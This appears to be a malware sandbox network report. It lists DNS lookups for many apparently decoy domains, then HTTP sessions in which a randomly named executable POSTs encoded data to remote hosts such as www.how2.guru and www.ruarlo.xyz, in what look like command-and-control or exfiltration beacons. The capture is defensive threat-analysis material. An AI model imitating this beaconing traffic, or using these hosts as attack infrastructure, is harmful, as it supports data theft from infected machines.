Oct 23, 2024 18:53:55.897895098 CEST | 192.168.11.20 | 1.1.1.1 | 0xb19 | Standard query (0) | www.ruarlo.xyz | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:09.441939116 CEST | 192.168.11.20 | 1.1.1.1 | 0xe02e | Standard query (0) | www.refs4refs.info | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:22.751192093 CEST | 192.168.11.20 | 1.1.1.1 | 0xe1cd | Standard query (0) | www.estrela-b.online | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:41.262746096 CEST | 192.168.11.20 | 1.1.1.1 | 0x95b8 | Standard query (0) | www.russe-trykk.online | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:54.978439093 CEST | 192.168.11.20 | 1.1.1.1 | 0x11f8 | Standard query (0) | www.1-mine.online | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:08.428690910 CEST | 192.168.11.20 | 1.1.1.1 | 0x805f | Standard query (0) | www.binacamasala.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:24.678219080 CEST | 192.168.11.20 | 1.1.1.1 | 0xde5e | Standard query (0) | www.wrl-llc.net | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:45.000207901 CEST | 192.168.11.20 | 1.1.1.1 | 0xd522 | Standard query (0) | www.xtelify.tech | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:59.308197021 CEST | 192.168.11.20 | 1.1.1.1 | 0x9a0c | Standard query (0) | www.bigliaserramenti.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:12.695924997 CEST | 192.168.11.20 | 1.1.1.1 | 0xff45 | Standard query (0) | www.theawareness.shop | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:26.052464962 CEST | 192.168.11.20 | 1.1.1.1 | 0xf12 | Standard query (0) | www.gokulmohan.online | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:39.721496105 CEST | 192.168.11.20 | 1.1.1.1 | 0xcb17 | Standard query (0) | www.3bbfibre3app.net | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:53.046901941 CEST | 192.168.11.20 | 1.1.1.1 | 0x178d | Standard query (0) | www.lichnyyrost.online | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:57:07.543816090 CEST | 192.168.11.20 | 1.1.1.1 | 0xa13c | Standard query (0) | www.innovators.group | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 23, 2024 18:52:49.589616060 CEST | 1.1.1.1 | 192.168.11.20 | 0x586c | No error (0) | drive.google.com | | 142.250.80.110 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:52:50.178540945 CEST | 1.1.1.1 | 192.168.11.20 | 0xe38 | No error (0) | drive.usercontent.google.com | | 142.250.176.193 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:53:27.188555002 CEST | 1.1.1.1 | 192.168.11.20 | 0x1ee0 | No error (0) | www.caprinaday.net | | 62.149.128.45 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:53:42.756848097 CEST | 1.1.1.1 | 192.168.11.20 | 0x3cd0 | No error (0) | www.how2.guru | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:53:42.756848097 CEST | 1.1.1.1 | 192.168.11.20 | 0x3cd0 | No error (0) | www.how2.guru | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:53:56.005949020 CEST | 1.1.1.1 | 192.168.11.20 | 0xb19 | No error (0) | www.ruarlo.xyz | | 162.0.231.203 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:09.609085083 CEST | 1.1.1.1 | 192.168.11.20 | 0xe02e | No error (0) | www.refs4refs.info | refs4refs.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 18:54:09.609085083 CEST | 1.1.1.1 | 192.168.11.20 | 0xe02e | No error (0) | refs4refs.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:09.609085083 CEST | 1.1.1.1 | 192.168.11.20 | 0xe02e | No error (0) | refs4refs.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:22.921046972 CEST | 1.1.1.1 | 192.168.11.20 | 0xe1cd | No error (0) | www.estrela-b.online | estrela-b.online | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 18:54:22.921046972 CEST | 1.1.1.1 | 192.168.11.20 | 0xe1cd | No error (0) | estrela-b.online | | 162.241.63.77 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:41.377896070 CEST | 1.1.1.1 | 192.168.11.20 | 0x95b8 | No error (0) | www.russe-trykk.online | | 185.134.245.113 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:55.089535952 CEST | 1.1.1.1 | 192.168.11.20 | 0x11f8 | No error (0) | www.1-mine.online | | 172.67.148.133 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:54:55.089535952 CEST | 1.1.1.1 | 192.168.11.20 | 0x11f8 | No error (0) | www.1-mine.online | | 104.21.11.72 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:08.590976000 CEST | 1.1.1.1 | 192.168.11.20 | 0x805f | No error (0) | www.binacamasala.com | binacamasala.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 18:55:08.590976000 CEST | 1.1.1.1 | 192.168.11.20 | 0x805f | No error (0) | binacamasala.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:08.590976000 CEST | 1.1.1.1 | 192.168.11.20 | 0x805f | No error (0) | binacamasala.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:24.816339016 CEST | 1.1.1.1 | 192.168.11.20 | 0xde5e | No error (0) | www.wrl-llc.net | wrl-llc.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 18:55:24.816339016 CEST | 1.1.1.1 | 192.168.11.20 | 0xde5e | No error (0) | wrl-llc.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:24.816339016 CEST | 1.1.1.1 | 192.168.11.20 | 0xde5e | No error (0) | wrl-llc.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:45.132436991 CEST | 1.1.1.1 | 192.168.11.20 | 0xd522 | No error (0) | www.xtelify.tech | xtelify.tech | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 18:55:45.132436991 CEST | 1.1.1.1 | 192.168.11.20 | 0xd522 | No error (0) | xtelify.tech | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:55:59.555155039 CEST | 1.1.1.1 | 192.168.11.20 | 0x9a0c | No error (0) | www.bigliaserramenti.com | | 75.2.19.62 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:12.803216934 CEST | 1.1.1.1 | 192.168.11.20 | 0xff45 | No error (0) | www.theawareness.shop | | 172.67.177.220 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:12.803216934 CEST | 1.1.1.1 | 192.168.11.20 | 0xff45 | No error (0) | www.theawareness.shop | | 104.21.83.154 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:26.167007923 CEST | 1.1.1.1 | 192.168.11.20 | 0xf12 | No error (0) | www.gokulmohan.online | | 104.21.64.124 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:26.167007923 CEST | 1.1.1.1 | 192.168.11.20 | 0xf12 | No error (0) | www.gokulmohan.online | | 172.67.185.22 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:39.928355932 CEST | 1.1.1.1 | 192.168.11.20 | 0xcb17 | No error (0) | www.3bbfibre3app.net | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 18:56:39.928355932 CEST | 1.1.1.1 | 192.168.11.20 | 0xcb17 | No error (0) | ghs.googlehosted.com | | 142.251.40.243 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:56:53.675441027 CEST | 1.1.1.1 | 192.168.11.20 | 0x178d | No error (0) | www.lichnyyrost.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:57:07.869746923 CEST | 1.1.1.1 | 192.168.11.20 | 0xa13c | No error (0) | www.innovators.group | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:57:07.869746923 CEST | 1.1.1.1 | 192.168.11.20 | 0xa13c | No error (0) | www.innovators.group | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49792 | 62.149.128.45 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe

Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:53:27.392762899 CEST | 536 | OUT | GET /pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS+CBDl0e/03G6vIGgM2DOx4ZCTRM54bCOA7z+XcSGAiseRvin1n9lPpnkGa0LOYYd0oIGRqFGq723QGUcE=&Hh=g6BlO HTTP/1.1
Host: www.caprinaday.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:53:27.587057114 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Wed, 23 Oct 2024 16:53:26 GMT
Connection: close
Content-Length: 5096
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Oct 23, 2024 18:53:27.587080002 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
Oct 23, 2024 18:53:27.587094069 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
Oct 23, 2024 18:53:27.587109089 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
Oct 23, 2024 18:53:27.587121964 CEST | 159 | IN
                                                                                                                                                                                                                        Data Ascii: oft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49793 | 13.248.169.48 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:53:42.869393110 CEST | 796 | OUT | POST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN70yfjq/gVSp945OfzrkkUv5WM75swcQsPBfQU4Gzhi9gMQOyHSmAljHNPa/e27+JQqI7DIZ+2tfOXdTMiwKgan9WDVWslKi6gtKZqTTeXjvcwHycelnC17RtIYtyTbqUn73mIGsrh9nldCeby9nC1THNO3C9TOvcSLEjONChu6zDQrm1F9D5bCg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49794 | 13.248.169.48 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:53:45.508618116 CEST | 816 | OUT | POST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN71SPjl8YVF5932ufzlEkQv4qM78V1dlEPB+gU5Frhl9gMI+yCdGAujHR9a6227+dQqILDIuLEivORVzMg+qgan9WDVXNIKiigq/JqS3CU9fdCCycehnCx7RsnYor8bvQn72WIG5X+qXlEfuaOs3/eYkJ4zzJRLuhvOSuUQwVK5gfivWMt/B4AfuyN4a2Ck+GtddWt/7PT/ug=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49795 | 13.248.169.48 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:53:48.152631998 CEST | 2578 | OUT | POST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Data Ascii: 2rul-= [TRUNCATED]
Oct 23, 2024 18:53:48.152723074 CEST | 5387 | OUT
                                                                                                                                                                                                                        Data Ascii: 7tU4iJSaB2wAAmnixdkZd+JDsqMcpWlVc47rjEvif+VrU6aGrAx/4BAt+MVFCBO0eIRY2k4+SyUuOo+Kp9VtI88q+TmRwHoLmfg6RJoS8rOGjNN+9BrdzU8/sL2BNn/kl11XymjJiYck25spwsEMAA7OBwaRC6CZzSjfXRGnHyZ4eP1538S+fR6FobU6Thfa0+Et8FnIQm9BavfO5DdZ+24UWjVbPYtbtax9CZw7Xay/CsuNMYI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49796 | 13.248.169.48 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:53:50.788615942 CEST | 531 | OUT | GET /7eim/?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:53:50.891609907 CEST | 390 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:53:50 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49797 | 162.0.231.203 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:53:56.174999952 CEST | 799 | OUT | POST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=fD8lNMkFG19czxYUAGlc8FMDZjFFsmxaOik7eU5yoWlK+auDzcNzUU1HZmtvhpab0o4FTK0mM9KOoQtuYOVRSZnWhXzisQDE6C4gYnCb23IQgC6ryKBm7S5mnUm+h7x2ZBRP6R+f9mDnPNc11Zy3Etors4Keki9nXjaDV9J/hsB++LiIfaYpQL60k0+dEQAH1g==
Oct 23, 2024 18:53:59.499102116 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:53:56 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49798 | 162.0.231.203 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:53:58.862000942 CEST | 819 | OUT | POST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=fD8lNMkFG19czVcUMFdct1MAWDFFlGxeOio7eVtiog1K97eDyZxzXU1HRGtqvJam0o0jTOomM9eOoVRuf99OTJnU0HzgoQDE6C4gYnWh23gQjyqrwrBn4S4U3km+l7wxZBQq6Un69gHnPMM1wYy0NtotvIKVgSpsYQ2LFfN8n+Ns7dvSCosNTYmGgEH1GSBcokd5ATlGZpP0zPfNsXQnMSI=
Oct 23, 2024 18:54:00.236774921 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:53:58 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49799 | 162.0.231.203 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:01.551112890 CEST | 7968 | OUT | POST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:54:02.607786894 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:01 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49800 | 162.0.231.203 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:04.247908115 CEST | 532 | OUT | GET /443n/?Hh=g6BlO&2rul-=SBUFO7UKbQxT/A0NMCw1slRydQol8mxlPD8CditPqx9i+IWA5JxkazMedHBluKiV/JkaYuM+MOSFojVsVdVmUJrzgHDhlyielwZPRH6/6joZww29waA6pwk= HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:54:04.432800055 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:04 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49801 | 3.33.130.190 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:54:09.719887018 CEST | 811 | OUT | POST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
